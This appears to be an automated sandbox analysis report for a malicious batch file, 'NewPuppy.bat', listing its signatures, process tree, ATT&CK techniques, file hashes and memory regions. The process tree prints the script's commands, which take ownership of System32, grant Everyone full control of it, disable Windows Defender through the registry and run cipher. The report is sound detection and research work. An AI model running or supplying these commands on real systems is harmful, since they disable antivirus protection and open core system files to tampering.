Overview

overview

10

Static

static

1

NewPuppy.bat

windows7-x64

10

Analysis

  • max time kernel
    104s
  • max time network
    30s
  • platform
    windows7_x64
  • resource
    win7-20240319-en
  • resource tags

    arch:x64arch:x86image:win7-20240319-enlocale:en-usos:windows7-x64system
  • submitted
    16-04-2024 12:58

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    NewPuppy.bat

  • Size

    1KB

  • MD5

    adc0d01c8d9a715dcbdd0506c623362a

  • SHA1

    3896c3932e00893ac0562ddfadf4f64ad1e52c70

  • SHA256

    1804250d557bbaff17ddd7f55b613622bc55fd8622260f10fe2012c1bc91d88f

  • SHA512

    b1025b218eb793edbe787aba785f51ea3c48a0f104d8cec260ed6d5272cff4aafcb389f455d42fdaf30cba49ded0d375a35c957f2f49a04e40a923cdd63008fd

Score
10/10
discoveryevasionexploittrojan

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 2 IoCs
    evasiontrojan
  • Possible privilege escalation attempt 2 IoCs
    exploit
  • Modifies file permissions 1 TTPs 2 IoCs
    discovery
  • Modifies Internet Explorer settings 1 TTPs 35 IoCs
    adwarespyware
  • Modifies registry class 28 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\NewPuppy.bat"
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2180
    • C:\Windows\system32\takeown.exe
      Takeown /f C:\Windows\System32\
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • Suspicious use of AdjustPrivilegeToken
      PID:2928
    • C:\Windows\system32\icacls.exe
      icacls "C:\Windows\system32" /grant:r "Everyone:(OI)(CI)F" "Guest:(OI)(CI)F"
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      PID:2192
    • C:\Windows\system32\reg.exe
      REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      2⤵
        PID:2720
      • C:\Windows\system32\reg.exe
        REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
        2⤵
        • Modifies Windows Defender Real-time Protection settings
        PID:2972
      • C:\Windows\System32\cipher.exe
        cipher /e /s /a
        2⤵
          PID:2148
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe"
        1⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2484
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2484 CREDAT:275457 /prefetch:2
          2⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:2916
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2484 CREDAT:275463 /prefetch:2
          2⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:2904
      • C:\Program Files\VideoLAN\VLC\vlc.exe
        "C:\Program Files\VideoLAN\VLC\vlc.exe"
        1⤵
        • Suspicious behavior: AddClipboardFormatListener
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of SetWindowsHookEx
        PID:960
      • C:\Windows\explorer.exe
        "C:\Windows\explorer.exe"
        1⤵
          PID:2356

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Initial Access

        Execution

        Persistence

        Create or Modify System Process

        1
        T1543

        Windows Service

        1
        T1543.003

        Privilege Escalation

        Create or Modify System Process

        1
        T1543

        Windows Service

        1
        T1543.003

        Defense Evasion

        Modify Registry

        2
        T1112

        Impair Defenses

        1
        T1562

        Disable or Modify Tools

        1
        T1562.001

        File and Directory Permissions Modification

        1
        T1222

        Credential Access

        Discovery

        Lateral Movement

        Collection

        Exfiltration

        Command and Control

        Impact

        Resource Development

        Reconnaissance

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
          Filesize

          344B

          MD5

          a0aecf219843a8e8cdfb9c3617c84e71

          SHA1

          7099af0c8e3a2335f1ffc894f40fc67371d613cc

          SHA256

          b89d2e152d590202d292f088c2dec2ee4623c768a495f2783b9e73ef0eb56af3

          SHA512

          7896d0fadca6d313d404f31367906c9cac0bbe622527a280993f76ef8685a85a66cab95554022bb47b9746a1db5ecef3a755365c955fea512af87fe7420f8307

          Download Submit
        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
          Filesize

          344B

          MD5

          0b4c5e45f45eeccfdb4eed0e0c6182eb

          SHA1

          7030f4211e188736dba1959527fec974aebd6289

          SHA256

          3e8b4701632f110bfa8d39f7c4b30a57391acb219beba8d1a54d03d61e9f215c

          SHA512

          f28398d1aa0ac18d6f48b8ee201f52e1ba537c81d0a353444d02e4d71dfe5ee29013903524e75055560c8c90ecfc5efa9b55b44f9d6f98e1de1fdba88fcd361e

          Download Submit
        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
          Filesize

          344B

          MD5

          1246f31c35e9af8268ea201c07a7afc9

          SHA1

          4d8b51d49800e2cd9cabe7716af47828dd1c65a1

          SHA256

          68b6bab1752e039b76acaff6c5892872ec5cb80bc9016118e95c55bc5826821d

          SHA512

          fdaee54fb1a52517edd4dee0f358b20150ac4e05c70855bf318b476ddfc315d138ed8ca65b6bfa93933645d64b49def08b6949955b869638a2c0185ad73638d4

          Download Submit
        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
          Filesize

          344B

          MD5

          10dd6f2012d171527c38de6783dddc6d

          SHA1

          5c251c9baead2da0adab387bd9f8a5b8b77ee9d3

          SHA256

          4fb94c0a33be1747ea3b41af0c8de1d0e4437992596fbccc9e569b6d99413aa7

          SHA512

          f11df7babda1007f028501368172a8ae8ee629d58aafc5cc6d582d819939ddb099062dec94743b37a37fea059504aeb73907695930c506013b842024770e4a29

          Download Submit
        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
          Filesize

          344B

          MD5

          39b2e73f9e7cc846c3bbd8e9372ade50

          SHA1

          f92f8560f4e8646c82dca8eb7f80dc79781f3c83

          SHA256

          7802844018259e47d0ad006fe100a7261e04da5621c25d34ae111280bd93a3c5

          SHA512

          6325397672775ed17158377ac0bfe3f90cf9122b4001ffbd827adb4e4f33db2ef6f28b49484f521bf5f570aa1705200229778a1acabc99100c4c658a15bfffe9

          Download Submit
        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
          Filesize

          344B

          MD5

          83d66e0841385c630bb7d39ec8f813b0

          SHA1

          786ec627a33aaf279501083602f5f5bfa2bc22f9

          SHA256

          dddb5fe24a2e39a70e69b2fa5c3f68450b75aba29635804c602dfb421e8cc1c3

          SHA512

          c37ff43a00672384ca46e972937dc214e248234fc3008bc950b47c78c7ea2b2eac132ff0c791d9ca5ee329d62fd03add32d1f7cd1211feea8faebd274bedafd6

          Download Submit
        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
          Filesize

          344B

          MD5

          3862ba327e81d16b35fcb8f4fef5b713

          SHA1

          a0d5e1780c0ba08b34dabe42e1da6441bd31d3ac

          SHA256

          fe8b4f51e1fa76c62e67a21b835689b1b2b6837a81c566f9cd509a5f3e0cbf02

          SHA512

          3f1db5e01fa01c4e71b23a505195fb11e38acb0c80db8fffd9d28b182005d688e220abc59f55c59a274fcf73144c6cee283cd28bf1daa33285c756299422e10a

          Download Submit
        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
          Filesize

          344B

          MD5

          dfcf792705f8809132ac81b30bdb07df

          SHA1

          b78293e28ce9f9ffe1c5dad7298f45945e310f88

          SHA256

          4e209fad600d398c2d6d78e9b632ba45bf6768db8ddded96b3c0dd0af416e52d

          SHA512

          4bd7d225df3e048401c1fde79f63d2a05d5464514d69f0a153668eef667f61a6176e892f1e175d1b7ae00fa77f4f3385db299112a979b65d190293d2a99ffda6

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\Cab7514.tmp
          Filesize

          67KB

          MD5

          753df6889fd7410a2e9fe333da83a429

          SHA1

          3c425f16e8267186061dd48ac1c77c122962456e

          SHA256

          b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

          SHA512

          9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\Cab762E.tmp
          Filesize

          68KB

          MD5

          29f65ba8e88c063813cc50a4ea544e93

          SHA1

          05a7040d5c127e68c25d81cc51271ffb8bef3568

          SHA256

          1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

          SHA512

          e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\Tar7653.tmp
          Filesize

          177KB

          MD5

          435a9ac180383f9fa094131b173a2f7b

          SHA1

          76944ea657a9db94f9a4bef38f88c46ed4166983

          SHA256

          67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

          SHA512

          1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\~DF6DAF2702CE0B0798.TMP
          Filesize

          16KB

          MD5

          8c8010f263c525ed1c59f2668e4a579f

          SHA1

          3465ea0914af3c2bbc2941df43d6f8647cc8dbfc

          SHA256

          089641b5e6a43cc74b6d247b72d769e9d29ddbaa1c30b6f105d7bb46dd978a93

          SHA512

          c0655a80041398d3fce75f9f70d681132d62eef975f7f018fc0cab69147db9409fdb2c229c5900b60b45c8e7274e66546a566051e282e083b93bceefc4613047

          Download Submit
        • memory/960-492-0x000000013F740000-0x000000013F838000-memory.dmp
          Filesize

          992KB

          Download
        • memory/960-493-0x000007FEFB620000-0x000007FEFB654000-memory.dmp
          Filesize

          208KB

          Download
        • memory/960-494-0x000007FEF6670000-0x000007FEF6926000-memory.dmp
          Filesize

          2.7MB

          Download
        • memory/960-495-0x000007FEFB320000-0x000007FEFB338000-memory.dmp
          Filesize

          96KB

          Download
        • memory/960-496-0x000007FEFB300000-0x000007FEFB317000-memory.dmp
          Filesize

          92KB

          Download
        • memory/960-497-0x000007FEFB2E0000-0x000007FEFB2F1000-memory.dmp
          Filesize

          68KB

          Download
        • memory/960-498-0x000007FEFB2C0000-0x000007FEFB2D7000-memory.dmp
          Filesize

          92KB

          Download
        • memory/960-499-0x000007FEF81E0000-0x000007FEF81FD000-memory.dmp
          Filesize

          116KB

          Download
        • memory/960-500-0x000007FEF8190000-0x000007FEF81A1000-memory.dmp
          Filesize

          68KB

          Download
        • memory/960-501-0x000007FEF55C0000-0x000007FEF6670000-memory.dmp
          Filesize

          16.7MB

          Download
        • memory/960-502-0x000007FEF7390000-0x000007FEF73F7000-memory.dmp
          Filesize

          412KB

          Download
        • memory/960-534-0x000007FEF55C0000-0x000007FEF6670000-memory.dmp
          Filesize

          16.7MB

          Download